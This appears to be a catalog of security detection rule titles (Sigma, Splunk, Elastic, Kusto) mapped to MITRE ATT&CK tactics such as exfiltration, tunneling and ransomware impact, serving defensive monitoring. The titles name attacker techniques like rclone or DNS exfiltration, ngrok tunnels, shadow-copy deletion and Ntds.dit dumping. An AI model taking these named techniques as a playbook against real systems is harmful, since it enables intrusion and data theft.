- Splunk QEMU Network Tunneling - Windows (Windows Event Log)
- Sigma RDP Over Reverse SSH Tunnel test
- Sigma RDP to HTTP or HTTPS Target Ports test
- Sigma RDP tunneling configuration enabled for port forwarding experimental
- Sigma RDP tunneling via ngrok detected experimental
- Splunk Scheduled Task with Potential SSH Tunnel - Windows (PowerShell)
- Splunk Scheduled Task with Potential SSH Tunnel - Windows (Sysmon)
- Splunk Scheduled Task with Potential SSH Tunnel - Windows (Windows Event Log)
- Sigma Silence.EDA Detection test
- Splunk ssh.exe Execution (Sysmon)
- Splunk ssh.exe Execution (Windows Event Log)
- Sigma Suspicious Plink Port Forwarding test
- Splunk Tunneling Process Created (PowerShell)
- Splunk Tunneling Process Created (Sysmon)
- Splunk Tunneling Process Created (Windows Event Log)
- Sigma Tunneling Tool Execution test
- Splunk Windows Ngrok Reverse Proxy Usage production
- Splunk Windows Potential Cloudflared Network Connection production
- Splunk Windows Potential Cloudflared Tunnel Execution production
- Splunk Windows Protocol Tunneling with Plink production
- Splunk Windows SoftEther VPN Masquerading as Legitimate Binary production
- Splunk Windows SSH Proxy Command production
Encrypted Channel T1573 6 rules
- Elastic Connection to Commonly Abused Free SSL Certificate Providers production
- Kusto Detect DNS queries reporting multiple errors from different clients - Static threshold based (ASIM DNS Solution) available
- Sigma Kalambur Backdoor Curl TOR SOCKS Proxy Execution experimental
- Sigma Potential Pikabot C2 Activity test
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Sigma Suspicious SSL Connection test
Exfiltration
Exfiltration Over Other Network Medium T1011 1 rule
- Splunk Windows Network Connection From Program In Suspect Location production
Automated Exfiltration T1020 10 rules
- Kusto Deimos Component Execution available
- Splunk Detect RClone Command-Line Usage production
- Splunk Detect Renamed RClone production
- Splunk Executable Create Script Process (PowerShell)
- Splunk Executable Create Script Process (Sysmon)
- Splunk Executable Create Script Process (Windows Event Log)
- Sigma Mail Forwarding/Redirecting Activity Via ExchangePowerShell Cmdlet experimental
- Sigma PowerShell Script With File Hostname Resolving Capabilities test
- Sigma PowerShell Script With File Upload Capabilities test
- Splunk Windows Mustang Panda USB Tool Execution production
Data Transfer Size Limits T1030 3 rules
Exfiltration Over C2 Channel T1041 14 rules
- Kusto Files Copied to USB Drives available
- Sigma Network Communication Initiated To Portmap.IO Domain test
- Splunk Potential Telegram API Request Via CommandLine production
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Splunk Powershell ICMP Data Exfiltration (PowerShell)
- Kusto RecordedFuture Threat Hunting IP All Actors
- Splunk Script Connected to External Destination - Windows (Sysmon)
- Splunk Script Connected to External Destination - Windows (Windows Event Log)
- Sigma Shai-Hulud NPM Package Malicious Exfiltration via Curl experimental
- Sigma Tunneling Tool Execution test
- Sigma Vice Society directory crawling script for data exfiltration (via ps_script) stable
- Splunk Windows Exfiltration Over C2 Via Invoke RestMethod production
- Splunk Windows Exfiltration Over C2 Via Powershell UploadString production
- Kusto Windows host username encoded in base64 web request
Exfiltration Over Alternative Protocol T1048 47 rules
- Sigma BITS payload downloaded via commandline experimental
- Sigma BITS payload downloaded via PowerShell experimental
- Kusto Bitsadmin Activity available
- Splunk BITSadmin Execution (PowerShell)
- Splunk BITSadmin Execution (Sysmon)
- Splunk BITSadmin Execution (Windows Event Log)
- Sigma Copy From Or To Admin Share Or Sysvol Folder test
- Sigma Data Export From MSSQL Table Via BCP.EXE test
- Kusto Dev-0270 Malicious Powershell usage available
- Kusto DNS events related to ToR proxies (ASIM DNS Schema)
- Sigma DNS Exfiltration and Tunneling Tools Execution test
- Splunk DNS Exfiltration Using Nslookup App production
- Splunk DNS Query Length With High Standard Deviation production
- Splunk Excessive Usage of NSLOOKUP App production
- Splunk Exfiltration via curl.exe - Windows (PowerShell)
- Splunk Exfiltration via curl.exe - Windows (Sysmon)
- Splunk Exfiltration via curl.exe - Windows (Windows Event Log)
- Sigma FTP Connection Open Attempt Via Winscp CLI experimental
- Splunk Potential CVE-2023-23397 (EDR)
- Splunk Potential CVE-2023-23397 (Sysmon)
- Splunk Potential CVE-2023-23397 (Windows Event Log)
- Sigma Potential Data Exfiltration Over SMTP Via Send-MailMessage Cmdlet test
- Elastic Potential Data Exfiltration via Rclone production
- Sigma Powershell DNSExfiltration test
- Sigma PowerShell ICMP Exfiltration test
- Sigma PUA - Restic Backup Tool Execution experimental
- Splunk PuTTY Secure Copy Client Execution (PowerShell)
- Splunk PuTTY Secure Copy Client Execution (Sysmon)
- Splunk PuTTY Secure Copy Client Execution (Windows Event Log)
- Splunk Rclone Execution (PowerShell)
- Splunk Rclone Execution (Sysmon)
- Splunk Rclone Execution (Windows Event Log)
- Sigma Suspicious Outbound SMTP Connections test
- Sigma Suspicious Redirection to Local Admin Share test
- Sigma Suspicious WebDav Client Execution Via Rundll32.EXE test
- Sigma Tap Driver Installation test
- Sigma Tap Driver Installation - Security test
- Sigma Tap Installer Execution test
- Sigma WebDav Client Execution Via Rundll32.EXE test
- Splunk Windows FTP Exfiltration (PowerShell)
- Splunk Windows FTP Exfiltration (Sysmon)
- Splunk Windows FTP Exfiltration (Windows Event Log)
- Elastic Windows Registry File Creation in SMB Share production
- Splunk Windows Rundll32 WebDAV Request production
- Splunk Windows Rundll32 WebDav With Network Connection production
- Splunk WinSCP Execution (Windows Event Log)
- Sigma Winscp Execution From Non Standard Folder experimental
Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted Non-C2 Protocol T1048.003 18 rules
- Splunk BITSadmin Execution (PowerShell)
- Splunk BITSadmin Execution (Sysmon)
- Splunk BITSadmin Execution (Windows Event Log)
- Splunk DNS Query Length With High Standard Deviation production
- Splunk Potential CVE-2023-23397 (EDR)
- Splunk Potential CVE-2023-23397 (Sysmon)
- Splunk Potential CVE-2023-23397 (Windows Event Log)
- Sigma Potential Data Exfiltration Over SMTP Via Send-MailMessage Cmdlet test
- Sigma PowerShell ICMP Exfiltration test
- Splunk Rclone Execution (PowerShell)
- Splunk Rclone Execution (Sysmon)
- Splunk Rclone Execution (Windows Event Log)
- Sigma Suspicious Outbound SMTP Connections test
- Sigma Suspicious WebDav Client Execution Via Rundll32.EXE test
- Sigma WebDav Client Execution Via Rundll32.EXE test
- Splunk Windows Rundll32 WebDAV Request production
- Splunk Windows Rundll32 WebDav With Network Connection production
- Splunk WinSCP Execution (Windows Event Log)
Exfiltration Over Physical Medium T1052 1 rule
- Elastic First Time Seen Removable Device production
Exfiltration Over Physical Medium: Exfiltration over USB T1052.001 1 rule
- Elastic First Time Seen Removable Device production
Transfer Data to Cloud Account T1537 1 rule
- Splunk High Frequency Copy Of Files In Network Share production
Exfiltration Over Web Service T1567 39 rules
- Sigma Arbitrary File Download Via ConfigSecurityPolicy.EXE test
- Sigma Communication To Ngrok Tunneling Service Initiated test
- Elastic Connection to Commonly Abused Web Services production
- Splunk Data Exfiltration via AWS CLI - Windows (Sysmon)
- Splunk Data Exfiltration via AWS CLI - Windows (Windows Event Log)
- Sigma DNS Query for Anonfiles.com Domain - DNS Client test
- Sigma DNS Query for Anonfiles.com Domain - Sysmon test
- Sigma DNS Query To MEGA Hosting Website test
- Sigma DNS Query To MEGA Hosting Website - DNS Client test
- Sigma DNS Query To Ufile.io test
- Sigma DNS Query To Ufile.io - DNS Client test
- Sigma LOLBAS Data Exfiltration by DataSvcUtil.exe test
- Splunk LOLBAS With Network Traffic production
- Splunk Mega Utility Execution - Windows (Sysmon)
- Splunk Mega Utility Execution - Windows (Windows Event Log)
- Sigma Network Connection Initiated To BTunnels Domains test
- Sigma Network Connection Initiated To Cloudflared Tunnels Domains test
- Sigma Network Connection Initiated To DevTunnels Domain test
- Sigma Network Connection Initiated To Mega.nz test
- Sigma Network Connection Initiated To Visual Studio Code Tunnels Domain test
- Sigma Potential Data Exfiltration Via Curl.EXE test
- Elastic Potential Data Exfiltration via Rclone production
- Elastic Potential File Transfer via Certreq production
- Elastic Potential File Transfer via Curl for Windows production
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Splunk Process Connection to Mega - Windows (Sysmon)
- Splunk Process Connection to Mega - Windows (Windows Event Log)
- Sigma Process Initiated Network Connection To Ngrok Domain test
- Sigma PUA - Rclone Execution test
- Sigma PUA - Restic Backup Tool Execution experimental
- Sigma Rclone Config File Creation test
- Splunk Rclone Execution (PowerShell)
- Splunk Rclone Execution (Sysmon)
- Splunk Rclone Execution (Windows Event Log)
- Sigma Suspicious Dropbox API Usage test
- Sigma Suspicious Non-Browser Network Communication With Telegram API test
- Splunk Windows Azure Storage Utility Execution Via CLI production
- Splunk Windows Gdrive Binary Activity production
- Splunk Windows OneDrive Share Mounted via Net production
Exfiltration Over Web Service: Exfiltration to Code Repository T1567.001 3 rules
- Elastic Connection to Commonly Abused Web Services production
- Sigma Network Connection Initiated To DevTunnels Domain test
- Kusto Powershell Empire Cmdlets Executed in Command Line available
Exfiltration Over Web Service: Exfiltration to Cloud Storage T1567.002 19 rules
- Elastic Connection to Commonly Abused Web Services production
- Sigma DNS Query for Anonfiles.com Domain - DNS Client test
- Sigma DNS Query for Anonfiles.com Domain - Sysmon test
- Sigma DNS Query To MEGA Hosting Website test
- Sigma DNS Query To MEGA Hosting Website - DNS Client test
- Sigma DNS Query To Ufile.io test
- Sigma DNS Query To Ufile.io - DNS Client test
- Sigma Network Connection Initiated To Mega.nz test
- Elastic Potential Data Exfiltration via Rclone production
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Sigma PUA - Rclone Execution test
- Sigma PUA - Restic Backup Tool Execution experimental
- Sigma Rclone Config File Creation test
- Splunk Rclone Execution (PowerShell)
- Splunk Rclone Execution (Sysmon)
- Splunk Rclone Execution (Windows Event Log)
- Sigma Suspicious Dropbox API Usage test
- Splunk Windows Azure Storage Utility Execution Via CLI production
- Splunk Windows OneDrive Share Mounted via Net production
Impact
Data Destruction T1485 28 rules
- Elastic Backup Deletion with Wbadmin production
- Splunk Cipher.exe Execution (Sysmon)
- Splunk Cipher.exe Execution (Windows Event Log)
- Splunk Common Ransomware Extensions production
- Splunk Common Ransomware Notes production
- Sigma Deleted Data Overwritten Via Cipher.EXE test
- Kusto Deletion of data on multiple drives using cipher exe available
- Splunk Detect DNS Query to Decommissioned S3 Bucket experimental
- Splunk Excessive File Deletion In WinDefender Folder production
- Sigma Fsutil Suspicious Invocation stable
- Sigma Potential BlackByte Ransomware Activity test
- Sigma Potential File Overwrite Via Sysinternals SDelete test
- Elastic Potential Ransomware Behavior - Note Files by System production
- Elastic Potential Ransomware Note File Dropped via SMB production
- Kusto Potential re-named sdelete usage available
- Kusto Potential re-named sdelete usage (ASIM Version)
- Sigma Potential Secure Deletion with SDelete test
- Elastic Potential System Tampering via File Modification production
- Sigma Renamed Sysinternals Sdelete Execution test
- Splunk Sdelete Application Execution production
- Kusto Sdelete deployed via GPO and run recursively available
- Kusto Sdelete deployed via GPO and run recursively (ASIM Version)
- Elastic Suspicious File Renamed via SMB production
- Elastic Third-party Backup Files Deleted via Unexpected Process production
- Splunk Windows Data Destruction Recursive Exec Files Deletion production
- Splunk Windows Disable Memory Crash Dump production
- Splunk Windows File Without Extension In Critical Folder production
- Splunk Windows High File Deletion Frequency production
Data Encrypted for Impact T1486 28 rules
- Kusto AV detections related to Europium actors
- Kusto AV detections related to Hive Ransomware
- Kusto AV detections related to Zinc actors available
- Sigma BitLocker feature configuration (Reg via command) experimental
- Sigma BitLocker server feature activation (PowerShell) experimental
- Sigma BlueSky Ransomware Artefacts test
- Kusto Dev-0270 Registry IOC - September 2022 available
- Kusto Dev-0530 File Extension Rename
- Sigma FunkLocker Ransomware File Creation experimental
- Splunk High Process Termination Frequency production
- Sigma Load Of RstrtMgr.DLL By A Suspicious Process test
- Sigma Load Of RstrtMgr.DLL By An Uncommon Process test
- Sigma LockerGoga Ransomware Activity stable
- Sigma Portable Gpg.EXE Execution test
- Sigma Potential Conti Ransomware Activity test
- Elastic Potential Ransomware Behavior - Note Files by System production
- Elastic Potential Ransomware Note File Dropped via SMB production
- Splunk Ransomware Notes bulk creation production
- Sigma Renamed Gpg.EXE Execution test
- Splunk Ryuk Test Files Detected production
- Splunk Samsam Test File Write production
- Sigma Suspicious Creation TXT File in User Desktop test
- Elastic Suspicious File Renamed via SMB production
- Sigma Suspicious Reg Add BitLocker test
- Sigma WannaCry Ransomware Activity test
- Splunk Windows .Key File Creation in Root Directory production
- Splunk Windows BitLocker Suspicious Command Usage production
- Splunk Windows DiskCryptor Usage production
Service Stop T1489 29 rules
- Sigma Application Uninstalled test
- Sigma Delete All Scheduled Tasks test
- Sigma Delete Important Scheduled Task test
- Sigma Disable Important Scheduled Task test
- Splunk Excessive Attempt To Disable Services production
- Sigma Important Scheduled Task Deleted or Disabled test
- Sigma Massive processes termination burst experimental
- Sigma Massive services deletion burst experimental
- Sigma Massive services termination burst experimental
- Sigma Process Terminated Via Taskkill test
- Sigma Service deactivation (command) experimental
- Elastic Service Disabled via Registry Modification production
- Splunk Service Stop Commands (PowerShell)
- Splunk Service Stop Commands (Sysmon)
- Splunk Service Stop Commands (Windows Event Log)
- Sigma Stop Windows Service Via Net.EXE test
- Sigma Stop Windows Service Via PowerShell Stop-Service test
- Sigma Stop Windows Service Via Sc.EXE test
- Sigma Suspicious Windows Service Tampering test
- Splunk Windows - Service Stop (PowerShell)
- Splunk Windows - Service Stop (Windows Event Log)
- Splunk Windows Excessive Service Stop Attempt production
- Splunk Windows Processes Killed By Industroyer2 Malware production
- Splunk Windows Security Account Manager Stopped production
- Splunk Windows Service Deletion In Registry production
- Splunk Windows Service Stop Attempt production
- Splunk Windows Service Stop By Deletion production
- Splunk Windows Service Stop Win Updates production
- Splunk Windows Set Account Password Policy To Unlimited Via Net production
Inhibit System Recovery T1490 56 rules
- Sigma All Backups Deleted Via Wbadmin.EXE test
- Sigma Amsi.DLL Load By Uncommon Process test
- Elastic Backup Deletion with Wbadmin production
- Sigma Backup Files Deleted test
- Splunk Bcdedit Command Back To Normal Mode Boot production
- Splunk BCDEdit Failure Recovery Modification production
- Sigma Boot Configuration Tampering Via Bcdedit.EXE stable
- Splunk Change To Safe Mode With Network Config production
- Sigma Copy From VolumeShadowCopy Via Cmd.EXE test
- Splunk Delete ShadowCopy With PowerShell production
- Sigma Delete Volume Shadow Copies Via WMI With PowerShell stable
- Splunk Deleting Shadow Copies production
- Sigma Deletion of Volume Shadow Copies via WMI with PowerShell test
- Sigma Deletion of Volume Shadow Copies via WMI with PowerShell - PS Script test
- Kusto Detect Malicious Usage of Recovery Tools to Delete Backup Files available
- Kusto Detecting UAC bypass - ChangePK and SLUI registry tampering available
- Kusto Detecting UAC bypass - elevated COM interface available
- Kusto Detecting UAC bypass - modify Windows Store settings available
- Splunk Disabling SystemRestore In Registry production
- Sigma File Recovery From Backup Via Wbadmin.EXE test
- Elastic Modification of Boot Configuration production
- Sigma New Root or CA or AuthRoot Certificate to Store test
- Sigma Potential Dtrack RAT Activity stable
- Sigma Potential Maze Ransomware Activity test
- Elastic Potential Ransomware Note File Dropped via SMB production
- Elastic Potential System Tampering via File Modification production
- Sigma Potentially Suspicious Volume Shadow Copy Vsstrace.dll Load test
- Splunk Prevent Automatic Repair Mode using Bcdedit production
- Sigma Registry Disable System Restore test
- Splunk Resize ShadowStorage volume production
- Sigma Sensitive File Access Via Volume Shadow Copy Backup test
- Sigma Shadow Copies Deletion Using Operating Systems Utilities stable
- Kusto Shadow Copy Deletions available
- Elastic Suspicious File Renamed via SMB production
- Sigma Suspicious Volume Shadow Copy VSS_PS.dll Load test
- Sigma Suspicious Volume Shadow Copy Vssapi.dll Load test
- Sigma System Restore Registry Modification via CommandLine experimental
- Elastic Third-party Backup Files Deleted via Unexpected Process production
- Elastic Volume Shadow Copy Deleted or Resized via VssAdmin production
- Elastic Volume Shadow Copy Deletion via PowerShell production
- Elastic Volume Shadow Copy Deletion via WMIC production
- Sigma VSS backup deletion (WMI) experimental
- Sigma VSS backup deletion or resize experimental
- Sigma VSS backup deletion via WMI (Powershell) experimental
- Sigma WannaCry Ransomware Activity test
- Splunk WBAdmin Delete System Backups production
- Sigma Windows Backup Deleted Via Wbadmin.EXE test
- Splunk Windows BitLocker Suspicious Command Usage production
- Splunk Windows Cisco Secure Endpoint Related Service Stopped production
- Sigma Windows native backup deletion experimental
- Sigma Windows native backup size re-configuration experimental
- Sigma Windows Recovery Environment Disabled Via Reagentc experimental
- Splunk Windows Security And Backup Services Stop production
- Splunk Windows Suspicious File in EFI Volume production
- Splunk Windows WBAdmin File Recovery From Backup production
- Splunk Windows WMIC Shadowcopy Delete production
Defacement T1491 6 rules
- Splunk Modification Of Wallpaper production
- Sigma Potential Ransomware Activity Using LegalNotice Message test
- Sigma Potentially Suspicious Desktop Background Change Using Reg.EXE test
- Sigma Potentially Suspicious Desktop Background Change Via Registry test
- Sigma Replace Desktop Wallpaper by Powershell test
- Splunk Windows Defacement Modify Transcodedwallpaper File production
Resource Hijacking T1496 7 rules
- Kusto Chia_Crypto_Mining IOC - June 2021 available
- Kusto DNS events related to mining pools (ASIM DNS Schema)
- Sigma Network Communication With Crypto Mining Pool stable
- Sigma Potential Crypto Mining Activity stable
- Splunk Potential Cryptomining Commands (PowerShell)
- Splunk Potential Cryptomining Commands (Sysmon)
- Splunk Potential Cryptomining Commands (Windows Event Log)
Network Denial of Service T1498 1 rule
- Sigma Potential BlackByte Ransomware Activity test
Endpoint Denial of Service T1499 5 rules
- Sigma Audit CVE Event test
- Sigma CVE-2024-49113 Exploitation Attempt - LDAP Nightmare experimental
- Kusto Excessive number of failed connections from a single source (ASIM Network Session schema) available
- Sigma LSASS Crash Via Netlogon Stack Buffer Overflow - CVE-2026-41089 experimental
- Splunk Potential CVE-2024-49113 - LDAPNightmare (Windows Event Log)
Endpoint Denial of Service: Application or System Exploitation T1499.004 1 rule
- Sigma Audit CVE Event test
System Shutdown/Reboot T1529 7 rules
- Sigma Silence.EDA Detection test
- Sigma Suspicious Execution of Shutdown test
- Sigma Suspicious Execution of Shutdown to Log Out test
- Splunk System Shutdown or Reboot (Windows Event Log)
- Splunk Windows System LogOff Commandline production
- Splunk Windows System Reboot CommandLine production
- Splunk Windows System Shutdown CommandLine production
Account Access Removal T1531 10 rules
- Splunk Account Password Changed from Command Line - Windows (PowerShell)
- Splunk Account Password Changed from Command Line - Windows (Windows Event Log)
- Elastic Account Password Reset Remotely production
- Sigma Remove Account From Domain Admin Group test
- Sigma User Logoff Event test
- Splunk Windows Account Access Removal via Logoff Exec production
- Splunk Windows Excessive Usage Of Net App production
- Splunk Windows Powershell Logoff User via Quser production
- Splunk Windows User Deletion Via Net production
- Splunk Windows User Disabled Via Net production
Disk Wipe T1561 2 rules
- Splunk Windows Raw Access To Disk Volume Partition production
- Splunk Windows Raw Access To Master Boot Record Drive production
Disk Wipe: Disk Structure Wipe T1561.002 2 rules
- Splunk Windows Raw Access To Disk Volume Partition production
- Splunk Windows Raw Access To Master Boot Record Drive production
Data Manipulation T1565 3 rules
- Sigma ISATAP Router Address Was Set experimental
- Sigma Powershell Add Name Resolution Policy Table Rule test
- Splunk Windows WBAdmin File Recovery From Backup production
Data Manipulation: Stored Data Manipulation T1565.001 1 rule
- Splunk Windows WBAdmin File Recovery From Backup production
Data Manipulation: Transmitted Data Manipulation T1565.002 1 rule
- Sigma ISATAP Router Address Was Set experimental
Uncategorized
T0136 T0136 2 rules
- Sigma Hidden account creation (with fast deletion) experimental
- Sigma User account creation disguised in a computer account experimental
Untagged
- Sigma .RDP File Created By Uncommon Application test
- Sigma AADInternals PowerShell Cmdlets Execution - ProccessCreation test
- Sigma AADInternals PowerShell Cmdlets Execution - PsScript test
- Sigma Active Directory Structure Export Via Ldifde.EXE test
- Sigma ADCS Certificate Template Configuration Vulnerability test
- Sigma ADCS Certificate Template Configuration Vulnerability with Risky EKU test
- Sigma Add Debugger Entry To AeDebug For Persistence test
- Sigma Add Debugger Entry To Hangs Key For Persistence test
- Sigma Add Windows Capability Via PowerShell Cmdlet test
- Sigma Add Windows Capability Via PowerShell Script test
- YARA-L ADFS DB Suspicious Named Pipe Connection
- Sigma Amsi.DLL Loaded Via LOLBIN Process test
- Sigma Anydesk Remote Access Software Service Installation test
- Sigma AppX Located in Known Staging Directory Added to Deployment Pipeline test
- Sigma AppX Located in Uncommon Directory Added to Deployment Pipeline test
- Sigma AppX Package Deployment Failed Due to Signing Requirements test
- Sigma Arbitrary Binary Execution Using GUP Utility test
- Kusto ASR Rare and Untrusted Executables
- Sigma Assembly DLL Creation Via AspNetCompiler test
- Sigma Base64 MZ Header In CommandLine test
- Sigma Cab File Extraction Via Wusa.EXE test
- Sigma Cab File Extraction Via Wusa.EXE From Potentially Suspicious Paths test
- Sigma Chromium Browser Headless Execution To Mockbin Like Site test
- Sigma ClickOnce Deployment Execution - Dfsvc.EXE Child Process test
- Sigma CodeIntegrity - Blocked Image Load With Revoked Certificate test
- Sigma CodeIntegrity - Disallowed File For Protected Processes Has Been Blocked test
- Sigma CodeIntegrity - Revoked Image Loaded test
- Sigma CodeIntegrity - Revoked Kernel Driver Loaded test
- Sigma CodeIntegrity - Unmet Signing Level Requirements By File Under Validation experimental
- Sigma CodeIntegrity - Unmet WHQL Requirements For Loaded Kernel Module test
- Sigma CodeIntegrity - Unsigned Image Loaded test
- Sigma CodeIntegrity - Unsigned Kernel Module Loaded test
- Sigma COLDSTEEL Persistence Service Creation test
- Sigma COLDSTEEL RAT Anonymous User Process Execution test
- Sigma COLDSTEEL RAT Cleanup Command Execution test
- Sigma COLDSTEEL RAT Service Persistence Execution test
- Sigma Command Executed Via Run Dialog Box - Registry test
- Sigma Computer Password Change Via Ksetup.EXE test
- Sigma Copy .DMP/.DUMP Files From Remote Share Via Cmd.EXE test
- Sigma CrackMaxpExec share permission enumeration experimental
- Sigma Creation of a Diagcab test
- Sigma Creation Of a Suspicious ADS File Outside a Browser Download test
- Sigma Cscript/Wscript Potentially Suspicious Child Process test
- Sigma Curl Web Request With Potential Custom User-Agent test
- Sigma CVE-2021-44077 POC Default Dropped File test
- Sigma CVE-2023-23397 Exploitation Attempt test
- Sigma CVE-2023-38331 Exploitation Attempt - Suspicious Double Extension File test
- Sigma CVE-2023-40477 Potential Exploitation - .REV File Creation test
- Sigma CVE-2023-40477 Potential Exploitation - WinRAR Application Crash test
- Sigma CVE-2024-1708 - ScreenConnect Path Traversal Exploitation test
- Sigma CVE-2024-1708 - ScreenConnect Path Traversal Exploitation - Security test
- Sigma Delete Defender Scan ShellEx Context Menu Registry Key experimental
- Sigma Deployment AppX Package Was Blocked By AppLocker test
- Sigma Deployment Of The AppX Package Was Blocked By The Policy test
- Sigma DiagTrackEoP Default Login Username test
- Sigma Diamond Sleet APT DNS Communication Indicators test
- Sigma Diamond Sleet APT File Creation Indicators test
- Sigma Diamond Sleet APT Process Activity Indicators test
- Sigma Disable Macro Runtime Scan Scope test
- Sigma DMP/HDMP File Creation test
- Sigma DNS Query To Put.io - DNS Client test
- Sigma DPRK Threat Actor - C2 Communication DNS Indicators test
- Sigma Driver Added To Disallowed Images In HVCI - Registry test
- Sigma DriverQuery.EXE Execution test
- Sigma Drop Binaries Into Spool Drivers Color Folder test
- Sigma Dump Ntds.dit To Suspicious Location test
- Sigma DumpStack.log Defender Evasion test
- Sigma Email Exifiltration Via Powershell test
- Sigma Enable Local Manifest Installation With Winget test
- Sigma Execution Of Non-Existing File test
- Sigma Execution of Suspicious File Type Extension test
- Sigma File Creation Related To RAT Clients experimental
- Sigma File Decryption Using Gpg4win test
- Sigma File Download From IP URL Via Curl.EXE test
- Sigma File Encryption Using Gpg4win test
- Sigma File Encryption/Decryption Via Gpg4win From Suspicious Locations test
- Splunk File with Samsam Extension production
- Sigma Firewall Rule Update Via Netsh.EXE test
- Sigma Forest Blizzard APT - Process Creation Activity experimental
- Sigma GatherNetworkInfo.VBS Reconnaissance Script Output test
- Sigma Goofy Guineapig Backdoor IOC test
- Sigma Goofy Guineapig Backdoor Service Creation test
- Sigma Griffon Malware Attack Pattern test
- Sigma HackTool - DiagTrackEoP Default Named Pipe test
- Sigma HackTool - Evil-WinRm Execution - PowerShell Module test
- Sigma HackTool - GMER Rootkit Detector and Remover Execution test
- Sigma HackTool - LaZagne Execution experimental
- Sigma HackTool - LocalPotato Execution test
- Sigma HackTool - NPPSpy Hacktool Usage test
- Sigma HackTool - SharpLDAPmonitor Execution test
- Sigma HackTool - Wmiexec Default Powershell Command test
- Sigma IE ZoneMap Setting Downgraded To MyComputer Zone For HTTP Protocols test
- Sigma IE ZoneMap Setting Downgraded To MyComputer Zone For HTTP Protocols Via CLI test
- Sigma ImagingDevices Unusual Parent/Child Processes test
- Sigma Import New Module Via PowerShell CommandLine test
- Sigma Important Windows Service Terminated Unexpectedly test
- Sigma Important Windows Service Terminated With Error test
- Sigma Insecure Proxy/DOH Transfer Via Curl.EXE test
- Sigma Insecure Transfer Via Curl.EXE test
- Sigma Internet Explorer DisableFirstRunCustomize Enabled test
- Sigma Kernel Memory Dump Via LiveKD test
- Sigma Lace Tempest Cobalt Strike Download test
- Sigma Lace Tempest File Indicators test
- Sigma Lace Tempest Malware Loader Execution test
- Sigma LiveKD Driver Creation test
- Sigma LiveKD Driver Creation By Uncommon Process test
- Sigma LiveKD Kernel Memory Dump File Created test
- Sigma Loading Diagcab Package From Remote Path test
- Sigma Local File Read Using Curl.EXE test
- Sigma Locked Workstation stable
- Sigma Logged-On User Password Change Via Ksetup.EXE test
- Sigma LOLBIN Execution From Abnormal Drive test
- Splunk MacOS - Re-opened Applications experimental
- Sigma Malicious DLL Load By Compromised 3CXDesktopApp test
- Sigma Microsoft Defender massive host infection experimental
- Sigma Microsoft Defender massive virus outbreach experimental
- Sigma Microsoft Defender signatures not up to date experimental
- Kusto Microsoft Recommended Driver Block List
- Sigma Mint Sandstorm - AsperaFaspex Suspicious Process Execution test
- Sigma Mint Sandstorm - Log4J Wstomcat Process Execution test
- Sigma Mint Sandstorm - ManageEngine Suspicious Process Execution test
- Sigma Mshtml.DLL RunHTMLApplication Suspicious Usage test
- Sigma MSI Installation From Suspicious Locations test
- Sigma Mstsc.EXE Execution From Uncommon Parent test
- Sigma NetSupport Manager Service Install test
- Sigma New File Association Using Exefile test
- Sigma New ODBC Driver Registered test
- Sigma New Virtual Smart Card Created Via TpmVscMgr.EXE test
- Sigma Nslookup PowerShell Download Cradle - ProcessCreation test
- Sigma NtdllPipe Like Activity Execution test
- Sigma Obfuscated IP Download Activity test
- Sigma Obfuscated IP Via CLI test
- Sigma Office Application Initiated Network Connection Over Uncommon Ports test
- Sigma Old TLS1.0/TLS1.1 Protocol Version Enabled test
- Sigma OneNote Attachment File Dropped In Suspicious Location test
- Sigma Onyx Sleet APT File Creation Indicators test
- Sigma PaperCut MF/NG Exploitation Related Indicators test
- Sigma PaperCut MF/NG Potential Exploitation test
- Kusto Password Spray
- Sigma PDF File Created By RegEdit.EXE test
- Sigma Peach Sandstorm APT Process Activity Indicators test
- Sigma Persistence Via Disk Cleanup Handler - Autorun test
- Sigma Persistence Via Hhctrl.ocx test
- Sigma Persistence Via TypedPaths - CommandLine test
- Sigma Pikabot Fake DLL Extension Execution Via Rundll32.EXE test
- Sigma Potential Active Directory Enumeration Using AD Module - ProcCreation test
- Sigma Potential Active Directory Enumeration Using AD Module - PsModule test
- Sigma Potential Active Directory Enumeration Using AD Module - PsScript test
- Sigma Potential APT FIN7 Reconnaissance/POWERTRASH Related Activity test
- Sigma Potential APT FIN7 Related PowerShell Script Created test
- Sigma Potential APT Mustang Panda Activity Against Australian Gov test
- Sigma Potential AS-REP Roasting via Kerberos TGT Requests experimental
- Sigma Potential Attachment Manager Settings Associations Tamper test
- Sigma Potential Attachment Manager Settings Attachments Tamper test
- Sigma Potential Binary Or Script Dropper Via PowerShell test
- Sigma Potential COLDSTEEL Persistence Service DLL Creation test
- Sigma Potential COLDSTEEL Persistence Service DLL Load test
- Sigma Potential COLDSTEEL RAT File Indicators test
- Sigma Potential COLDSTEEL RAT Windows User Creation test
- Sigma Potential Compromised 3CXDesktopApp Beaconing Activity - DNS test
- Sigma Potential Compromised 3CXDesktopApp Beaconing Activity - Netcon test
- Sigma Potential Cookies Session Hijacking test
- Sigma Potential CVE-2022-29072 Exploitation Attempt test
- Sigma Potential CVE-2023-21554 QueueJumper Exploitation test
- Sigma Potential CVE-2023-36874 Exploitation - Fake Wermgr Execution test
- Sigma Potential CVE-2023-36874 Exploitation - Fake Wermgr.Exe Creation test
- Sigma Potential CVE-2023-36874 Exploitation - Uncommon Report.Wer Location test
- Sigma Potential CVE-2023-36884 Exploitation - Share Access test
- Sigma Potential CVE-2023-36884 Exploitation Dropped File test
- Sigma Potential CVE-2024-3400 Exploitation - Palo Alto GlobalProtect OS Command Injection - File Creation test
- Sigma Potential Data Exfiltration Via Audio File test
- Sigma Potential Defense Evasion Activity Via Emoji Usage In CommandLine - 1 test
- Sigma Potential Defense Evasion Activity Via Emoji Usage In CommandLine - 2 test
- Sigma Potential Defense Evasion Activity Via Emoji Usage In CommandLine - 3 test
- Sigma Potential Defense Evasion Activity Via Emoji Usage In CommandLine - 4 test
- Sigma Potential Devil Bait Related Indicator test
- Sigma Potential Discovery Activity Via Dnscmd.EXE test
- Sigma Potential DLL Injection Via AccCheckConsole test
- Sigma Potential Encrypted Registry Blob Related To SNAKE Malware test
- Sigma Potential Exploitation Attempt From Office Application test
- Sigma Potential Exploitation of CVE-2024-3094 - Suspicious SSH Child Process test
- Sigma Potential Exploitation of CVE-2024-37085 - Suspicious Creation Of ESX Admins Group test
- Sigma Potential Exploitation of CVE-2024-37085 - Suspicious ESX Admins Group Activity test
- Sigma Potential File Override/Append Via SET Command test
